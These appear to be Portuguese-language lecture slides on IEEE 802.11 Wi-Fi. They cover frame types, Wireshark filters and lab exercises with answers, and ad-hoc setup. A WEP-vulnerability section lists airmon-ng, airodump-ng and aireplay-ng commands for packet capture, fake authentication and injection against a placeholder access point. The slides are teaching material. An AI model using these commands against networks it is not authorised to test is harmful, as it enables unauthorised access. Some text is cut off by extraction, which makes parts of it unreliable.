Redes sem fio IEEE Prof. Dr. Ruy de Oliveira IFMT

Redes sem fio IEEE 802.11

Prof. Dr. Ruy de Oliveira IFMT

Operação Básica do Modo Infraestrutura

 Ponto de acesso (AP) e estação móvel (STA)

 O AP usa várias frequências de rádio (denominada canais) para se comunicar com as STAs

 O AP informa sua presença em cada canal pela transmissão de mensagens curtas em intervalos regulares (10 mens./s)

 Tais mensagens são chamadas de beacons

 A STA varre os canais a procura das beacons

 Processo conhecido como scanning

 Processo pode ser acelerado por probing (STA envia um solicitação – request)

 A STA pode descobrir vários APs numa rede grande e deve decidir ao qual se conectar.

 Dependerá de: Nível de sinal, política de segurança, etc

Operação Básica do Modo Infraestrutura (Cont.)

 A STA desejando se conectar ao AP envia uma mensagem (authenticate) request message a ele

 O AP responde imediatamente enviando uma mensagem authenticate response message indicando o aceite (exemplo em que a segurança não é usada)

 A STA envia uma mensagem association request

 O AP responde com uma mensagem association reply

 A STA está então conectada (associada), e pode transmitir dados através do AP

 Há três tipos de mensagens:

 Control: mensagens curtas que informam os dispositivos quando começar ou encerrar transmissão

IEEE Messages

 Principais mensagens e seus filtros no Wireshark

Operação Básica do Modo Infraestrutura (Cont.)

((wlan.fc.type_subtype==8) ) && !((wlan_mgt.ssid == "REDEPUBLICAIFMT") || (wlan_mgt.ssid == "DAI- PROFESSORES-DEPARTAMENTO") )

((wlan.fc.type_subtype==8) ) && !((wlan_mgt.ssid == "REDEPUBLICAIFMT") || (wlan_mgt.ssid

== "DAI-PROFESSORES-DEPARTAMENTO") || (wlan_mgt.ssid == "DACC") )

802.11 – Cabeçalho de uma mensagem de Dados

• TA: transmiter address

Bridge

Quadros de Gerenciamento (Management)

Vários tipos de quadro

 Beacon (notify)

 Probe (request e response)

 Authenticate (request e response)

 Associate (request e response)

 Deassociate (notify)

 Deauthenticate (notify)



 “notify”  não é esperada nenhuma resposta

Quadros Management /Beacon

 Cada quadro contém informação/campo específico

 O quadro beacon, por exemplo, contém:

 Cabeçalho MAC

 Timestamp: tempo corrido desde que o AP foi iniciado

 Beacon interval: tempo entre 2 beacons

 Capability info: define fatores opcionais do AP

 SSID (Service Set Identifier): nome da rede

 Supported Data Rates: taxas suportadas pelo AP

 Radio Parameters: frequência exata usada pelo AP

 Power Save Flags: usado para informar dispositivos sem fio “sonolentos” que há dados esperando por

Quadros do padrão

802.11

Filtros Wireshark

 nome dos

filtros para cada

parte do quadro

802.11

Wireshark com Interface Wireless no Linux

 iwlist wlan0 scanning

 iwconfig

 airmon-ng start wlan0

 iwconfig mon0 (ou wlan0mon) channel 6

 wireshark &

Exercício com o Wireshark no Laboratório

1. Comece a captura de 3 minutos no canal escolhido (1, 6 ou 11)

2. Mostre o SSID e o MAC de todos os APs encontrados

3. Mostre a quantidade de quadros beacon, probe, authenticate, associate, deauthenticate e deassociate relativas a cada AP

4. Quantos quadros capturados estão danificados?

5. Mostre o MAC de todas as estações que trocaram quadro de dados com os APs

Filtros no Wireshark

 Quadros não retransmitidos

 !(wlan.fc.retry == 1)

 Quadros de association response

 wlan.fc.type_subtype == 0x01

Exercícios Wireshark

 1- Qual são os SSIDs dos dois Aps que estão difundindo mais quadros “beacon” nessa amostragem?

 Probes que não venham dos Aps “linksys12” e “30 Munroe St”

 wlan.fc.type_subtype == 0x08 and !( (wlan_mgt.ssid

== "linksys12") || (wlan_mgt.ssid == "30 Munroe St"))

 RESPOSTA: os APs de SSID “30 Murroe St” e

“linksys12

 2- “Qual é o intervalo de tempo entre as transmissões de quadro “beacon” do AP linksys_SES_24086?

 wlan_mgt.ssid == "linksys_ses_24086”

 RESPOSTA: o intervalo “beacon” presente no quadro de gerenciamento do IEEE 802.11 é de 0.1024 segundos. Percebe-se que os quadros do AP “30 Munroe St” aparecem com tal regularidade, mas o

Exercícios Wireshark (Cont.)

 3- Qual é, em hexadecimal, o endereço MAC fonte (source) no quadro “beacon” do AP “30 Munroe St”?

Lembre-se que os campos “source”, “destination” e “BSS”

correspondem a três endereços dentro de um quadro 802.11.

 (wlan.fc.type_subtype == 0x08 ) && (wlan_mgt.ssid ==

"30 Munroe St")

 RESPOSTA: o endereço MAC “source” do APs de SSID

“30 Murroe St” e 00:16:b6:f7:1d:51

 2- Qual é, em hexadecimal, o endereço MAC de destino (destination) no quadro “beacon” do AP “30 Munroe St”?

 (wlan.fc.type_subtype == 0x08 ) && (wlan_mgt.ssid ==

Exercícios Wireshark (Cont.)

 5- Qual é, em hexadecimal, o endereço MAC BSS id de destino (destination) no quadro “beacon” do AP “30 Munroe St”?

 (wlan.fc.type_subtype == 0x08 ) && (wlan_mgt.ssid ==

"30 Munroe St")

 RESPOSTA: o endereço MAC BSS id do APs de SSID

“30 Murroe St” e 00:16:b6:f7:1d:51 (observe que este é igual ao endereço fonte (source), porque trata-se de um quadro “beacon”

 5- Os quadros “beacon” do AP “30 Munroe St informam que o AP suporta 4 taxas de dados e 8 taxas de dados estendidas adicionais. Quais são essas taxas?

 (wlan.fc.type_subtype == 0x08 ) && (wlan_mgt.ssid ==

"30 Munroe St")

 RESPOSTA: taxas de dados: 1/2/5.5/11 Mbps. Taxas de

Configuração ad-hoc no linux

 ifconfig wlan0 down

 iwconfig wlan0 mode ad-hoc

 iwconfig wlan0 channel 3

 iwconfig wlan0 enc off

 iwconfig wlan0 essid nossa-adhoc

 ifconfig wlan0 192.168.60.5 netmask 255.255.255.0

 ifconfig wlan0 up

 HABILITAR IP FORWARDING – INTERNET GW

 iptables --table nat --append POSTROUTING --out-interface eth0 -j

18

Configuração ad-hoc no Windows 10

 netsh wlan show drivers

 netsh wlan set hostednetwork mode=allow ssid= key=

 netsh wlan start hostednetwork

 Now open open Windows 10 Control Panel.

 Choose Network and Sharing Center.

 Change Adapter Settings.

 Here, for the recently created Wi-Fi connection you need to turn on the Internet Connection Sharing

 And then use the drop down menu and select the recently created ad hoc

 You can get the IP address of the recently

Segurança das redes WiFi (vulnerabilidade do WEP)

 ifconfig wlan0 down

 iwconfig wlan0 mode monitor

 ifconfig wlan0 up

 airmon-ng start wlan0 (cria interface mon0)

 Iwconfig mon0

 airodump-ng mon0 (mostra redes na área coberta)

 Obtem-se BSSID do AP, Canal e ESSID (nome do AP)

 airodump-ng mon0 –bssid 11:22:33:44:55:66 –c 3 –w arq_crack

 (captura dados do AP, canal 3, e salvo no arquivo arq_crack)

 aireplay-ng -1 3 –a 11:22:33:44:55:66 mon0

 Aireplay-ng 3 –b 11:22:33:44:55:66 –h 77:88:99:AA:BB:CC mon0

 autenticação “fake” (-1) no canal 3

Exemplo:

MAC AP: 11:22:33:44:55:66 MAC host: 77:88:99:AA:BB:CC

Linha de comando - Windows 10

 Netsh wlan show hostednetwork – lista int configurada

Bibliografia

 Wireless Communications & Networks, 2a edição Willian Stallings, Prentice Hall, 2005. (livro texto)

 802.11 Wireless Networks: The Definitive Guide, 2a edição, M. Gast, O’Reilly Media, 2005.

 Introduction to Wireless and Mobile Systems, 2a edição, D. Agrawal e Q. Zeng, 2006.

 Redes de Computadores e a Internet: Uma Abordagem Top-Down, 5ª edição, J. F. Kurose e K. W.